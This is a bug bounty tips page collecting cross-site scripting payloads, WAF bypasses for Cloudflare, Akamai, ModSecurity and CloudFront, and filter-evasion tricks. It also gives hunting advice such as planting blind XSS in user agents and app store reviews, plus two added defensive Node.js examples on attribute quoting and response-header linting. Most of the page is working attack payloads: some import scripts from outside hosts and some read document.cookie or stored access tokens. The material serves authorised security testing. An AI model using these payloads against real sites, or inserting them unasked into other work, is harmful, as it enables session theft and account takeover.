Book of BugBounty Tips
Cross Site Scripting (XSS)

Last updated 1 month ago

  • Target[.]com/index.php?xss=<a href=x onfocus=alert(23) name=jj>

  • Blind xss

Payloads

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
Guys, bypassed Cloudflare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
 "><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
XSS
<body ontouchstart=alert(1)>
Triggers when a finger touches the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from the touch screen
<body ontouchmove=alert(1)>
Triggers when a finger is dragged across the screen.
$` onerror=alert(1);//
" onfocus="alert(1)" autofocus="

<math><x xlink:href=javascript:confirm`1`>click

HTML INJECTION + XSS INJECTION 

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

Cloudflare WAF Bypass
<img src=x onError=import('//1152848220/')>
Akamai WAF Bypass
<x onauxclick=import('//1152848220/')>click
Mod_Security WAF Bypass
<x onauxclick=import('//1152848220/')>click
#BugBounty  #bugbountytip

Some payloads that worked for me in popping up a stored XSS:

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

Good luck!

xss payload + &NewLine;

<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>

<img src="X" onerror=top[8680439..toString(30)](1337)>

<input onfocus="alert('xss');" autofocus>

#BugBountyTip - Useful #XSS Payloads. Today I used this:
< a href="mailto:a"+/onmouseover=prompt(document.domain)>

Data URI -

Self XSS to Stored XSS
If you find a jsp page with no parameters, you can actually add path parameters using a semicolon, like this: http://example.com/test.jsp ;');alert(1)// and perform XSS. Apache Tomcat supports this. #Bugbountytip #BugBounty #XSS
Bug bounty tip: put a blind XSS payload in your user agent before you fill in a contact form. ;-)
bugbountytip If you get a reflected XSS so that you can only add attributes to a hidden field, DON'T settle for accessKey XSS. Check the JavaScript in the page for any sort of document.getElementById("x").click() functions. If you can get your input to have that ID: ALERT XD
bugbounty #bugbountytip #bugbountytips Sometimes user input is reflected into a value without any quotations. Eg: Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().
A useful XSS filter bypass technique I use when everything else is not working is to take the closing tag off, e.g. hhh<img src="#" onmouseenter="prompt('XSS')" gggg
Testing a shopping site; Try the XSS payload in order ID parameter once you order an item rather than just an IDOR. They forget to sanitize there coz they are meant to be just numbers ;) #bugbountyTips #XSS
While looking at .js files, try to identify the weak places in the code. For example, innerHTML indicates there might be XSS.
Tip for blind XSS: inject bXSS payloads in App Store / Play Store app reviews. Many times companies use third-party app review analysis apps. The payload can get triggered on the third-party app, which can give you access to some sensitive information.
XSS through open redirect - /x:1/:///%01javascript:alert(document.cookie)/
#bugbountytip You can turn an input box into automatic #XSS by setting agnostic payload on the "onfocus" attribute and then setting it to "autofocus". Eg: <input onfocus="alert(0);" autofocus> This will result in automatic XSS (no user interaction).
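Added example (not from the book or from any of the quoted hunters): a small Node.js script showing why the "just add a space" tip works even against htmlspecialchars(), and why the onfocus/autofocus input above needs no user interaction to be a finding. The fix it demonstrates is the usual one: always quote attribute values and escape them. escapeHtml, renderUnquoted, renderQuoted, parseAttributes and injectedAttributes are names chosen for this demo; the payload string is the one from the tips above.

```javascript
// Added example, not from the original page: an htmlspecialchars()-style
// escaper is not enough when the reflected value lands in an UNQUOTED
// attribute, because a plain space already ends the attribute value.
// All function names here are assumptions chosen for this demo.

// Equivalent of PHP htmlspecialchars($s, ENT_QUOTES): escapes & < > " '.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Weak template: escaped, but the attribute value is not quoted.
function renderUnquoted(value) {
  return `<input type="text" name="q" value=${escapeHtml(value)}>`;
}

// Hardened template: the value is always quoted AND escaped.
function renderQuoted(value) {
  return `<input type="text" name="q" value="${escapeHtml(value)}">`;
}

// Simplified HTML start-tag tokenizer: returns the attribute names the
// browser would see. Quoted values run to the matching quote; unquoted
// values end at the first whitespace character.
function parseAttributes(tag) {
  const names = [];
  let i = tag.indexOf(' ') + 1;            // skip "<tagname "
  const end = tag.lastIndexOf('>');
  while (i < end) {
    while (i < end && /\s/.test(tag[i])) i++;
    if (i >= end) break;
    let name = '';
    while (i < end && !/[\s=]/.test(tag[i])) name += tag[i++];
    names.push(name.toLowerCase());
    while (i < end && /\s/.test(tag[i])) i++;
    if (tag[i] === '=') {
      i++;
      while (i < end && /\s/.test(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {          // quoted value: up to the matching quote
        const close = tag.indexOf(q, i + 1);
        i = close === -1 ? end : close + 1;
      } else {                               // unquoted value: up to the next whitespace
        while (i < end && !/\s/.test(tag[i])) i++;
      }
    }
  }
  return names;
}

// Attributes the template never intended to emit (event handlers, autofocus, ...).
const EXPECTED = new Set(['type', 'name', 'value']);
function injectedAttributes(tag) {
  return parseAttributes(tag).filter((n) => !EXPECTED.has(n));
}

// Demo with the payload from the tip above: a space, then onfocus + autofocus.
const payload = 'x onfocus=alert(0) autofocus';
console.log('unquoted ->', injectedAttributes(renderUnquoted(payload))); // [ 'onfocus', 'autofocus' ]
console.log('quoted   ->', injectedAttributes(renderQuoted(payload)));   // []
```

Run it with `node attr-context.js`. The point for a code review is that escaping alone never decides the outcome; the attribute context does, so the template must quote every attribute value it interpolates.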
Use the <svg onload=alert(1)> payload as a file extension, when the extension is reflected in HTML. Sometimes developers validate the filename and forget to validate the extension.
#bugbountytip Here is a #XSS polyglot: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Split your XSS payload into two like for ex. FName: <img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS
#bugbounty tip: to demonstrate XSS impact, don't use alert('alert'). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem('access_token'))
I found an endpoint without extension and parameters. The response was JSON. I added .html and a parameter with an XSS payload, which resulted in HTML with XSS. Try it. #bugbounty
When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code
https://twitter.com/dirtycoder0124/status/1162927865542762496
There are some endpoints that show JSON but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html”, and they show special chars: easy XSS ;)
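Added example (not from the book or from the quoted hunters): a small Node.js linter that, given captured HTTP responses, flags the server-side weaknesses behind the two tips above: JSON served with a text/html Content-Type (and without X-Content-Type-Options: nosniff), and a session cookie set without HttpOnly, which is exactly what makes alert(document.cookie) a meaningful proof of impact. The sample responses, the URL paths, the cookie name and the function names (looksLikeJson, lintResponse, lintAll) are all constructed for this demo.

```javascript
// Added example, not from the original page: a response-header linter for
// the misconfigurations behind "JSON served as text/html" and
// "session readable from document.cookie". Sample data is constructed.
const SAMPLE_RESPONSES = [
  {
    url: '/api/profile',                                  // constructed: JSON body, HTML content type
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=utf-8', 'Set-Cookie': 'session=abc123; Path=/' },
    body: '{"name":"<b>bold</b>"}',
  },
  {
    url: '/api/orders',                                   // constructed: correctly hardened
    status: 200,
    headers: {
      'Content-Type': 'application/json',
      'X-Content-Type-Options': 'nosniff',
      'Set-Cookie': 'session=abc123; Path=/; HttpOnly; Secure',
    },
    body: '[{"id":1}]',
  },
  {
    url: '/',                                             // constructed: ordinary HTML page
    status: 200,
    headers: { 'Content-Type': 'text/html' },
    body: '<html><body>home</body></html>',
  },
];

// True when the body parses as a JSON object or array.
function looksLikeJson(body) {
  const t = String(body).trim();
  if (!(t.startsWith('{') || t.startsWith('['))) return false;
  try { JSON.parse(t); return true; } catch { return false; }
}

// Returns a list of short finding codes for one response.
function lintResponse(res) {
  const findings = [];
  // Normalise header names to lower case so lookups are case-insensitive.
  const h = Object.fromEntries(Object.entries(res.headers).map(([k, v]) => [k.toLowerCase(), v]));
  const ctype = (h['content-type'] || '').split(';')[0].trim().toLowerCase();

  // JSON body but a browser-renderable content type: reflected values become HTML.
  if (looksLikeJson(res.body) && ctype !== 'application/json') findings.push('json-as-html');

  // Without nosniff the browser may still sniff the body as HTML.
  if ((h['x-content-type-options'] || '').trim().toLowerCase() !== 'nosniff') findings.push('missing-nosniff');

  // Session cookies without HttpOnly are readable from script (document.cookie).
  const cookies = [].concat(h['set-cookie'] || []);
  for (const c of cookies) {
    const name = c.split(';')[0].split('=')[0].trim();
    if (!/;\s*httponly(\s*;|\s*$)/i.test(c)) findings.push(`cookie-without-httponly:${name}`);
  }
  return findings;
}

// Map of url -> findings for a batch of responses.
function lintAll(responses) {
  return Object.fromEntries(responses.map((r) => [r.url, lintResponse(r)]));
}

console.log(lintAll(SAMPLE_RESPONSES));
// { '/api/profile': [ 'json-as-html', 'missing-nosniff', 'cookie-without-httponly:session' ],
//   '/api/orders': [], '/': [ 'missing-nosniff' ] }
```

In practice the header objects would come from a proxy export or a crawler; the checks themselves do not change. The remediation for the first finding is the one the tip implies: send application/json plus nosniff, and never write user-controlled values into a text/html response without context-aware escaping.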
@kunalp94: If you got unvalidated redirect issue, don't just submit it yet, try to trigger reflective XSS, it'll make report more interesting. My favourite payload is javascript://%0aalert(1) or javascript://%250aalert(1) in case of double encoding. :)#bugbounty #hackerone
I just had to break out of a comment to cause XSS during a pentest, if you guys come across this issue try this : --!><Svg/Onload=confirm(document.domain)> it worked for me in this case. #bugbounty #pentesting
#BugBountyTip When you are dealing with XSS, try to change the device or user-agent to Mobile; you might get it to work. In my case the homepage is different across devices, the XSS is in the username, and the payload is Unicode UTF-16
if you google ".xss.ht" you can find where others are testing and maybe reveal some priv programs. :P
Have you ever come across an issue where you could pop XSS but parentheses () get filtered? This payload "onfocus="alert`1`"autofocus=" will bypass that problem #BugBounty #bugbountytip
If you have stored HTML injection in the tag of a page (fairly common with Web Cache Poisoning), you can DOS the page's scripts by inserting a malicious CSP via the meta tag. Sometimes you can even inject into a meta tag in the header and just use the " to escape.
Here's an interesting #bugbountytip: You can bypass a lot of #XSS filters using HTML comments. They bypass it because they don't look/act like other tags. You can sometimes insert additional HTML too. Example: <!----><script>alert(0);</script> #infosec #CyberSecrurity #BugBounty
We all know about '-alert-' and ';alert();' but I figured out some alternatives by fuzzing the latest Firefox.
'^alert()^' 'alert()' '/alert()/'
https://twitter.com/B1ueB0ne/status/1091538912235769856
Assume the server filters ) and you want to bypass it; then use: "-alert`1`," E.g. window.location.replace("http://site.com/?x=3"); window.location.replace("http://site.com/?x=3"-alert`1`,") will do the trick.
#BugBounty #BugBountyTips #XSS If the program replaces all user input in the tag (ex: <h1>, <script>, etc.) with blank, you can add a Line Feed (%0a) before the closing tag to bypass (ex: <script%0a>, </h1%0a>)
#bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced
CloudFront bypass: Worked on a public program today ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> Would be interested to know if this is target specific or whether other CloudFront websites are vulnerable #bugbountytip #xss
Recently discovered login XSS filter bypass:
Input: "<> onmouseover="hack()
Reflection: <a class="login-link v-button" href="https://site.com/test"&lt;&gt; "hack()">Log in
* <, >, on* => Filtered
* " => Not Filtered
Bypass: ononmouseover=mouseover=onmouseover="alert()
If you find HTML injection, or a triager claims you can't execute an Open Redirect inside a web page without JavaScript, use this payload: ><meta http-equiv="Refresh" content="0; url='https://naglinagli.github.io'" /> #bugbountytips #BugBounty
Multi-context XSS polyglot " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// by @avlidienbrunn
https://twitter.com/Bugcrowd/status/1339417608169222145?s=20